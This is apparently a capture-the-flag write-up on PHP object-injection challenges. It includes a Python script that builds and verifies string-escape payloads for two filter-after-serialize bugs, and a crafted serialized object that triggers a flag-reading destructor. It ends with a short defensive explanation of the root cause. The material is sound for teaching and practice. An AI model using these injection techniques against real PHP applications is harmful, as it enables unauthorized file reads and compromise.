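Both Ez_escape1 and Ez_escape2 rest on the same arithmetic: the filter runs on the already-serialized string, so it changes the byte count of a property value without changing the length that serialize() wrote in front of it, and unserialize() then reads a fixed number of bytes too many (Ez_escape1, +2 per replacement) or too few (Ez_escape2, -1 per replacement). As an added Python example that is not the challenge's or the writeup's code, the script below models serialize()/unserialize() for the O/s/i types these classes produce, applies the two filters, and checks that the injected number/num values are what unserialize() ends up with. The simulator is a deliberately minimal model of PHP, not PHP itself.

```python
# Added example (not the challenge's or the writeup's code): build and verify
# the PHP deserialization string-escape payloads for Ez_escape1 and Ez_escape2
# with a minimal Python model of serialize()/unserialize() (O/s/i types only).


def _ser_value(v):
    # PHP counts string length in bytes; the payloads here are ASCII.
    return f"i:{v};" if isinstance(v, int) else f's:{len(v)}:"{v}";'


def php_serialize_object(cls: str, props: list) -> str:
    """serialize() of an object with the given public properties, in order."""
    body = "".join(_ser_value(k) + _ser_value(v) for k, v in props)
    return f'O:{len(cls)}:"{cls}":{len(props)}:{{{body}}}'


def php_unserialize(s: str):
    """Parse one O/s/i value the way PHP does: a string is taken to be exactly
    its declared length, and anything after the closing '}' is ignored."""
    pos = 0

    def parse():
        nonlocal pos
        kind = s[pos]
        if kind == "i":
            end = s.index(";", pos)
            pos, val = end + 1, int(s[pos + 2:end])
            return val
        if kind == "s":
            colon = s.index(":", pos + 2)
            n, start = int(s[pos + 2:colon]), colon + 2
            if s[start + n:start + n + 2] != '";':
                raise ValueError("declared string length does not match data")
            pos = start + n + 2
            return s[start:start + n]
        if kind == "O":
            colon = s.index(":", pos + 2)
            n = int(s[pos + 2:colon])
            cls, pos = s[colon + 2:colon + 2 + n], colon + 2 + n + 2
            colon = s.index(":", pos)
            count, pos = int(s[pos:colon]), colon + 2
            props = {}
            for _ in range(count):
                key = parse()
                props[key] = parse()
            if s[pos] != "}":
                raise ValueError("object not terminated")
            pos += 1
            return cls, props
        raise ValueError(f"unsupported type {kind!r}")

    return parse()


# Ez_escape1: each 'nzgnb' grows by 2 bytes, so the declared length overshoots
# the real value by 2 bytes per copy and the tail is parsed as a new property.
def escape1_filter(s: str) -> str:
    return s.replace("nzgnb", "nzgyyds")


def build_escape1_name() -> str:
    tail = '";s:6:"number";i:1008611;}'
    if len(tail) % 2:
        raise ValueError("tail length must be a multiple of the 2-byte gain")
    return "nzgnb" * (len(tail) // 2) + tail


def simulate_escape1(name: str):
    raw = php_serialize_object("escape", [("name", name), ("number", 10086)])
    return php_unserialize(escape1_filter(raw))


# Ez_escape2: each 'Haidilao' shrinks by 1 byte, so the haidilao string swallows
# one following byte per copy: exactly the '";s:4:"core";s:NN:"' glue in front of
# our core value, whose contents then supply the replacement properties.
def escape2_filter(s: str) -> str:
    return s.replace("Haidilao", "Hedilao")


def build_escape2_params() -> dict:
    core = '";s:4:"core";s:3:"123";s:3:"num";s:4:"2020";}'
    glue = f'";s:4:"core";s:{len(core)}:"'
    return {"haidilao": "Haidilao" * len(glue), "core": core}


def simulate_escape2(params: dict):
    raw = php_serialize_object("escape2", [("haidilao", params["haidilao"]),
                                           ("core", params["core"]), ("num", "2019")])
    return php_unserialize(escape2_filter(raw))


if __name__ == "__main__":
    print(simulate_escape1(build_escape1_name()))
    print(simulate_escape2(build_escape2_params()))
```

On the defensive side the root cause is visible in the simulator: str_replace runs on a string whose length fields were already fixed. Filtering the inputs before serialize() instead of after, or never passing user-controlled data to unserialize() at all, removes the escape entirely.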
AA_is_who

```php
<?php
highlight_file(__FILE__);
class AA {
    public $name;
    protected $power;
    public function __destruct() {
        if ($this->name === "Aryb1n") {
            echo "AA is Aryb1n";
            if ($this->power > 100000) {
                echo "AA is powerful";
                echo file_get_contents("/flag");
            } else {
                echo "AA is not so weak";
            }
        } else {
            echo "who is AA?";
        }
    }
}
$aa = $_GET["aa"];
unserialize($aa);
```
aa is taken from GET; $power must be greater than 100000 and $name must be Aryb1n, so serialize an object accordingly. $power is protected, so its serialized property name has to be padded with %00 bytes; alternatively, URL-encode the whole serialized string.
```php
<?php
class AA {
    public $name = "Aryb1n";   // quotes added: a bare Aryb1n would be an undefined constant
    protected $power = 1000000;
}
$a = new AA();
print serialize($a);
print urlencode(serialize($a));   // the protected name comes out as %00%2A%00power
?>
```
[image]